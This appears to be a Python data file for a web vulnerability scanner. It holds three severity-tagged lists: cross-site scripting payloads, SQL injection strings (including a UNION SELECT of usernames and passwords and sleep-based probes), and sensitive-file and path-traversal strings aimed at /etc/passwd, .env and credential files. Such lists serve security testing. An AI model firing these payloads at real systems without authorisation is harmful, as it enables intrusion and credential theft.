XSS_PAYLOADS = [
    "<script>alert('XSS')</script>,high",
    "<img src='x' onerror='alert(1)'>,high",
    "<svg/onload=alert('XSS')>,high",
    "<body onload=alert(1)>,high",
    "<iframe id=x onblur=alert(1)></iframe><input autofocus>,medium",
    "<input onblur=alert(1) id=x><input autofocus>,medium",
    "<textarea onblur=alert(1) id=x></textarea><input autofocus>,medium",
    "<button onblur=alert(1) id=x></button><input autofocus>,medium",
    "<select onblur=alert(1) id=x></select><input autofocus>,medium",
    "<p><script>/* Bad stuff here... */</script></p>,high",
    "<p>This post was extremely helpful.</p>,low",
    "<script>/* Bad stuff here... */</script>,high",
    "<a autofocus onfocus=alert(1) href></a>,medium",
    "<a autofocus onfocusin=alert(1) href></a>,medium",
    "<a id=x tabindex=1 onfocus=alert(1)></a>,medium",
    "<a id=x tabindex=1 onfocusin=alert(1)></a>,medium",
    "<a onafterscriptexecute=alert(1)><script>1</script>,high",
    "<a onbeforecopy=\"alert(1)\" contenteditable>test</a>,medium",
    "<a onbeforecut=\"alert(1)\" contenteditable>test</a>,medium",
    "<a onbeforescriptexecute=alert(1)><script>1</script>,high",
    "<a onblur=alert(1) id=x tabindex=1 style=display:block>test</a><input value=clickme>,medium",
    "<a onclick=\"alert(1)\" style=display:block>test</a>,medium",
    "<a oncontextmenu=\"alert(1)\" style=display:block>test</a>,medium",
    "<a oncopy=alert(1) value=\"XSS\" autofocus tabindex=1 style=display:block>test,medium",
    "<a oncut=alert(1) value=\"XSS\" autofocus tabindex=1 style=display:block>test,medium",
    "<a ondblclick=\"alert(1)\" autofocus tabindex=1 style=display:block>test</a>,medium",
    "<button oncut=alert(1) value=\"XSS\" autofocus tabindex=1 style=display:block>test,medium",
    "<button ondblclick=\"alert(1)\" autofocus tabindex=1 style=display:block>test</button>,medium",
    "<button onfocusout=alert(1) id=x tabindex=1 style=display:block>test</button><input value=clickme>,medium",
    "<button onkeydown=\"alert(1)\" contenteditable style=display:block>test</button>,medium",
    "<button onkeypress=\"alert(1)\" contenteditable style=display:block>test</button>,medium",
    "<button onkeyup=\"alert(1)\" contenteditable style=display:block>test</button>,medium",
    "<button onmousedown=\"alert(1)\" style=display:block>test</button>,medium",
    "<button onmouseenter=\"alert(1)\" style=display:block>test</button>,medium",
    "<button onmouseleave=\"alert(1)\" style=display:block>test</button>,medium",
    "<button onmousemove=\"alert(1)\" style=display:block>test</button>,medium",
    "<button onmouseout=\"alert(1)\" style=display:block>test</button>,medium"
]

SQLI_PAYLOADS = [
    "' OR 1=1 --,high",
    "' UNION SELECT null, null, username, password FROM users --,high",
    "' OR 'a'='a,medium",
    "' OR 'x'='x' --,medium",
    "AND 1,low",
    "AND 0,low",
    "AND true,low",
    "AND false,low",
    "1-false,low",
    "1-true,low",
    "1*56,low",
    "-2,low",
    "1' ORDER BY 1--+,medium",
    "1' ORDER BY 2--+,medium",
    "1' ORDER BY 3--+,medium",
    "1' ORDER BY 1,2--+,medium",
    "1' ORDER BY 1,2,3--+,medium",
    "1' GROUP BY 1,2,--+,medium",
    "1' GROUP BY 1,2,3--+,medium",
    "GROUP BY columnnames having 1=1 --,medium",
    "-1' UNION SELECT 1,2,3--+,high",
    "OR 1=1,medium",
    "OR 1=0,low",
    "OR x=x,low",
    "OR x=y,low",
    "OR 1=1#,medium",
    "OR 1=0#,low",
    "OR x=x#,low",
    "OR x=y#,low",
    "OR 1=1--,medium",
    "OR 1=0--,low",
    "or sleep(5)=,high",
    " or sleep(5)=,high",
    "')) or sleep(5)=,high",
    "')) or sleep(5)=,high"
]

SENSITIVE_FILES = [
    "/.git/,high",
    "/.env,high",
    "/config.php,high",
    "/wp-config.php,high",
    "/database.yml,high",
    "/admin/,medium",
    "/backup/,medium",
    "/logs/,medium",
    "/.htaccess,high",
    "/.htpasswd,high",
    "/phpinfo.php,high",
    "/.DS_Store,low",
    "/web.config,high",
    "/credentials.json,high",
    "/secrets.json,high",
    "/docker-compose.yml,high",
    "/.idea/,low",
    "/.vscode/,low",
    "/node_modules/,low",
    "/vendor/,low",
    "/composer.lock,low",
    "/package-lock.json,low",
    "/cgi-bin/,medium",
    "/tmp/,low",
    "/uploads/,medium",
    "/private/,high",
    "/info.php,medium",
    "/old/,low",
    "/test/,low",
    "/install.php,medium",
    "/setup.php,medium",
    "/database.sql,high",
    "/db_backup.sql,high",
    "/robots.txt,low",
    "../../../../etc/passwd,high",
    "....//....//....//etc/passwd,high",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd,high",
    "../../../../etc/.htaccess,high",
    "../../../../var/www/html/config.php,high"
]
